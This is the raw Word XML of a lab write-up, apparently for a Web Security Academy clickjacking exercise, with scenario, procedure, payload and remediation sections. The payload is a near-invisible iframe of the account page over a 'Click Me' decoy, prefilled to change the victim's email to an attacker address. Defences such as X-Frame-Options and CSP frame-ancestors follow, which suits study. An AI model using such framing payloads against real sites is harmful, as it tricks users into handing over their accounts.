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1D5DB" w14:textId="501F8964" w:rsidR="00320924" w:rsidRDefault="00973F43" w:rsidP="00973F43">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r w:rsidRPr="00973F43">
        <w:t>SCENARIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAAB47D" w14:textId="77EB7FFA" w:rsidR="00973F43" w:rsidRPr="0045781B" w:rsidRDefault="0045781B" w:rsidP="0045781B">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t>The application possesses a vulnerability in its login functionality and a delete account button protected by a CSRF token. We will try to craft some HTML that frames</w:t>
      </w:r>
      <w:r w:rsidRPr="0045781B">
        <w:t xml:space="preserve"> the account page and fools the user into </w:t>
      </w:r>
      <w:r w:rsidR="00725D7B">
        <w:t xml:space="preserve">changing </w:t>
      </w:r>
      <w:r w:rsidRPr="0045781B">
        <w:t>their account</w:t>
      </w:r>
      <w:r w:rsidR="00725D7B">
        <w:t>’s email address</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by clicking on a decoy website’s button</w:t>
      </w:r>
      <w:r w:rsidRPr="0045781B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343CBE68" w14:textId="77777777" w:rsidR="00973F43" w:rsidRDefault="00973F43" w:rsidP="00973F4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732B13E" w14:textId="16E075B8" w:rsidR="00973F43" w:rsidRDefault="00973F43" w:rsidP="00973F4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PROCEDURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7E86A5" w14:textId="36981197" w:rsidR="00973F43" w:rsidRDefault="0039752E" w:rsidP="00825F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Open the application and login using the credentials provided to act as a target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6D2735" w14:textId="1B6A6635" w:rsidR="00E65A4E" w:rsidRDefault="00E65A4E" w:rsidP="00825F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Now, as we studied in the article, we will try to craft a malicious HTML with some CSS which will come over the actual page and position itself onto the </w:t>
      </w:r>
      <w:r w:rsidR="00725D7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Change Email </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>button and will blur the original content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460BC2D6" w14:textId="7AF84BB7" w:rsidR="005742C4" w:rsidRDefault="005742C4" w:rsidP="00825F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Due to which the user will think that this is one of the </w:t>
      </w:r>
      <w:r w:rsidR="009871D8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>steps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> of accessing their account and which will cause the user to click the malicious text appearing as a button and below it will be the </w:t>
      </w:r>
      <w:r w:rsidR="00725D7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>email change</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECEF20E" w14:textId="300C15C3" w:rsidR="009871D8" w:rsidRDefault="009871D8" w:rsidP="00825F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Go to the exploit server and paste the payload into the body tag of the exploit and click store and view the exploit in order to see if </w:t>
      </w:r>
      <w:r w:rsidR="006D59C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>it’s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> working correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1661AE" w14:textId="13F53A1A" w:rsidR="009871D8" w:rsidRPr="00825F83" w:rsidRDefault="009871D8" w:rsidP="00825F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At the end, deliver the exploit to the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A244228" w14:textId="77777777" w:rsidR="00973F43" w:rsidRDefault="00973F43" w:rsidP="00973F4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78B68CC" w14:textId="198F0C1D" w:rsidR="00973F43" w:rsidRDefault="00973F43" w:rsidP="00973F4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PAYLOAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CF5389" w14:textId="77777777" w:rsidR="0039752E" w:rsidRPr="0039752E" w:rsidRDefault="0039752E" w:rsidP="0039752E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039752E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C479B4" w14:textId="77777777" w:rsidR="0039752E" w:rsidRPr="0039752E" w:rsidRDefault="0039752E" w:rsidP="0039752E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039752E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">    iframe {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007D9415" w14:textId="77777777" w:rsidR="0039752E" w:rsidRPr="0039752E" w:rsidRDefault="0039752E" w:rsidP="0039752E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039752E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">        position:relative;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA6AB1D" w14:textId="77777777" w:rsidR="0039752E" w:rsidRPr="0039752E" w:rsidRDefault="0039752E" w:rsidP="0039752E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039752E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">        width:1000px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FF6E4C" w14:textId="77777777" w:rsidR="0039752E" w:rsidRPr="0039752E" w:rsidRDefault="0039752E" w:rsidP="0039752E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039752E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">        height: 800px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72373B3D" w14:textId="77777777" w:rsidR="0039752E" w:rsidRPr="0039752E" w:rsidRDefault="0039752E" w:rsidP="0039752E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039752E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">        opacity: .01;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE88700" w14:textId="77777777" w:rsidR="0039752E" w:rsidRPr="0039752E" w:rsidRDefault="0039752E" w:rsidP="0039752E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039752E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">        z-index: 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328FDDF2" w14:textId="77777777" w:rsidR="0039752E" w:rsidRPr="0039752E" w:rsidRDefault="0039752E" w:rsidP="0039752E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039752E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544269AD" w14:textId="77777777" w:rsidR="0039752E" w:rsidRPr="0039752E" w:rsidRDefault="0039752E" w:rsidP="0039752E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039752E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">    div {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DCE6BF" w14:textId="77777777" w:rsidR="0039752E" w:rsidRPr="0039752E" w:rsidRDefault="0039752E" w:rsidP="0039752E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039752E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">        position:absolute;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8CD925" w14:textId="77777777" w:rsidR="0039752E" w:rsidRPr="0039752E" w:rsidRDefault="0039752E" w:rsidP="0039752E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039752E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        top:515px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19733D48" w14:textId="77777777" w:rsidR="0039752E" w:rsidRPr="0039752E" w:rsidRDefault="0039752E" w:rsidP="0039752E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039752E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">        left:60px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7502A8A7" w14:textId="77777777" w:rsidR="0039752E" w:rsidRPr="0039752E" w:rsidRDefault="0039752E" w:rsidP="0039752E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039752E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">        z-index: 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020D0309" w14:textId="77777777" w:rsidR="0039752E" w:rsidRPr="0039752E" w:rsidRDefault="0039752E" w:rsidP="0039752E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039752E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">        background-color: blue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483A2731" w14:textId="77777777" w:rsidR="0039752E" w:rsidRPr="0039752E" w:rsidRDefault="0039752E" w:rsidP="0039752E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039752E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79FE621C" w14:textId="77777777" w:rsidR="0039752E" w:rsidRPr="0039752E" w:rsidRDefault="0039752E" w:rsidP="0039752E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039752E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F06BED0" w14:textId="77777777" w:rsidR="0039752E" w:rsidRPr="0039752E" w:rsidRDefault="0039752E" w:rsidP="0039752E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0039752E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;div&gt;Click Me&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0FE047" w14:textId="3EA91414" w:rsidR="00973F43" w:rsidRPr="0039752E" w:rsidRDefault="0039752E" w:rsidP="0039752E">
      <w:pPr>
        <w:pStyle w:val="BodyText2"/>
      </w:pPr>
      <w:r w:rsidRPr="0039752E">
        <w:t>&lt;iframe src="https://0a990043041728bf84ab8d5400cd00aa</w:t>
      </w:r>
      <w:r w:rsidR="00725D7B" w:rsidRPr="00725D7B">
        <w:t>.web-security-academy.net/my-account?email=hacker@attacker-website.com"&gt;&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1386616A" w14:textId="77777777" w:rsidR="00973F43" w:rsidRDefault="00973F43" w:rsidP="00973F4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C225B9A" w14:textId="5E12728D" w:rsidR="00973F43" w:rsidRDefault="00973F43" w:rsidP="00973F43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REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E62462A" w14:textId="59DC0B4B" w:rsidR="00067E6E" w:rsidRPr="00067E6E" w:rsidRDefault="00067E6E" w:rsidP="00067E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067E6E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Same Origin Policy (SOP) Implementation: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067E6E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidRPr="00067E6E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>se the X-Frame-Options: DENY or X-Frame-Options: SAMEORIGIN HTTP header to restrict the site from being embedded in an iframe by unauthorized origins. This effectively counters clickjacking attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBF499E" w14:textId="05A58893" w:rsidR="00067E6E" w:rsidRPr="00067E6E" w:rsidRDefault="00067E6E" w:rsidP="007A4F2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 w:rsidRPr="00067E6E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Implement Anti-Clickjacking UI Measures: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067E6E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Ensure the user must re-enter their password or complete a CAPTCHA before sensitive actions like changing email addresses. This makes it more difficult for attackers to trick users into unintended actions, even if they manage to deceive them once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3214FD66" w14:textId="25EB6ED9" w:rsidR="00C740D4" w:rsidRPr="00A30079" w:rsidRDefault="00067E6E" w:rsidP="00067E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A30079">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Content Security Policy (CSP) Deployment:</w:t>
      </w:r>
      <w:r w:rsidR="00A30079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A30079">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Adopt a Content Security Policy (CSP) to prevent unauthorized inline scripts and restrict sources that can embed the application. Utilizing the frame-ancestors directive can be especially useful to specify which sources are allowed to frame the content, defending against iframe abuse.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C740D4" w:rsidRPr="00A30079" w:rsidSect="00973F4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EA0605"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1D3E4D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B90352"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="94C4C6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2020484">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2821985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2EA"/>
    <w:rsid w:val="00067E6E"/>
    <w:rsid w:val="002562EA"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="0039752E"/>
    <w:rsid w:val="0040394C"/>
    <w:rsid w:val="0045781B"/>
    <w:rsid w:val="00550BCF"/>
    <w:rsid w:val="005742C4"/>
    <w:rsid w:val="006D59C0"/>
    <w:rsid w:val="00725D7B"/>
    <w:rsid w:val="00825F83"/>
    <w:rsid w:val="00973F43"/>
    <w:rsid w:val="009871D8"/>
    <w:rsid w:val="00A30079"/>
    <w:rsid w:val="00C740D4"/>
    <w:rsid w:val="00E65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5FDB4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{63946321-D049-4BA1-904F-4695388E9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3F43"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/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973F43"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0045781B"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"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rsid w:val="0045781B"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00825F83"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText2">
    <w:name w:val="Body Text 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyText2Char"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0039752E"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyText2Char">
    <w:name w:val="Body Text 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="0039752E"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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97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349</Words>
  <Characters>1992</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>16</Lines>
  <Paragraphs>4</Paragraphs>
  <ScaleCrop>false</ScaleCrop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Rudransh Singh Rajpurohit</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Rudransh Singh Rajpurohit</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-20T07:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-06T05:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>